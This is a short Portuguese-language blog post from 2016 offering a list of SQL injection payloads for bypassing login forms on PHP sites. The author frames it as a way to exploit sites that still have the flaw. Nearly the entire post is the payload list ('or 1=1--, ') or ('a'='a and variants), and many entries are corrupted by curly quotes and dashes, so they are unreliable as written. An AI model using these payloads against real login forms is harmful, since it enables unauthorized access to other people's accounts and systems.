quarta-feira, 20 de janeiro de 2016

Publicado quarta-feira, janeiro 20, 2016 por com 0 comentário

Dorks para testar injeção SQL em formulários PHP

Ainda há vários sites na internet com essa falha, e há várias maneiras de explorá-la. E uma dessas maneiras é testar em formulários onde há campos de login e senha. Abaixo está uma lista que usava para a fim de testar se o formulário contém a falha SQL.



b' or ' 1='
' or '1
' or '|
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
admin ' - -
' or 0=0 --
"or 0=0 --
' or 0=0 #
"or 0=0 #
' or ' x'='x
"or" x"="x
') or (' x'='x
' or 1=1 --
"or 1=1 --
' or a=a --
"or" a"="a
') or (' a'='a
") or ("a"="a
hi "or" a"="a
hi "or 1=1 --
hi ' or 1=1 --
hi ' or ' a'='a
hi ') or (' a'='a
hi") or ("a"="a
hi ‘ or 1=1 –
hi ‘ or ‘ a’='a
hi ‘) or (‘ a’='a
hi”) or (“a”=”a
admin ‘ – -
‘ or 0=0 –
“or 0=0 –
‘ or ‘ 1
b’ or ‘ 1=’
‘ or ’1
‘ or ‘|
‘ or ‘a’='a
‘ or ”=’
‘ or 1=1–
‘) or (‘a’='a
‘ or ’1'=’1
‘ or 0=0 #
“or 0=0 #
‘ or ‘ x’='x
“or” x”=”x
‘) or (‘ x’='x
“or” a”=”a
“) or (“a”=”a
hi “or” a”=”a
hi “or 1=1 –
‘ or a=a –
' or ' 1
' or '1'='1
' or 1=1--
'or''='
' or 'a'='a
') or ('a'='a
      edit

0 comentários:

Postar um comentário